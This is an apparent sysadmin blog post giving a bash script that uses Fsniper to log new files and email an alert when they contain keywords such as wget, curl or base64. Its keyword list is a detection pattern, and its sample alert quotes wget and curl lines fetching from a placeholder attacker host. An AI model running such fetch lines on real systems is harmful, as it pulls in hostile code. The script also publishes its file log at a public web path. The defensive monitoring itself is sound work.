Detect New Files and Send Notification if Suspicious

This post will required Fsniper installed and running on your box. Please see following post: FSniper – Monitor Newly Created Files in Directory . This is similar to popular paid-version of ConfigServer eXploit Scanner (cxs), which also using inotify functionality which comes since kernel 2.6.13.

I am using Fsniper to check and detect new files and let handler trigger following scripts. This scripts will log any new files which captured by FSniper to /var/www/html/new_files.txt (so i can browse the files using web browser by accessing http://yourwebsite.com/new_files.txt) and then notify me whenever they found any of suspicious words inside the files:

wget, curl, lynx, gcc, perl, sh, cd, mkdir, touch, base64

#!/bin/bash output_file='/var/www/html/new_files.txt' user_owner=`ls -al $1 | awk '{print $3}'` ip=`hostname -i` subject='Found something suspicious' emailto='youremail@domain.tld' message=/tmp/emailmessage.txt   echo $(date +"%Y-%m-%d") $(date +%k:%M) ">>" $1 "|" $user_owner >> $output_file   danger=`egrep -iH '(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch|base64)' $1 | wc -l`   if [ $danger -gt 0 ]; then echo 'Server:' $(hostname) > $message egrep -iH '(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch|base64)' $1 >> $message mail -s "$ip | $subject" "$emailto" < $message fi

The email you will received will be similar like this:

From: root To: youremail@domain.tld Subject: 192.168.1.1 | Found something suspicious Email Body: me.myserver.domain.tld /home/user/pu Server: hostn ablic_html/test3.php:wget http://192.168.0.100/bad_thing.php /home/user/public_html/test3.php:curl http://hackers.tld/scripts

This will help you monitor any changes files and make sure you are the first to know if the new files is containing unwanted words. You can modify the script to suit your needs.


출처 : http://blog.secaserver.com/2011/06/detect-new-files-and-send-notification-if-suspicious/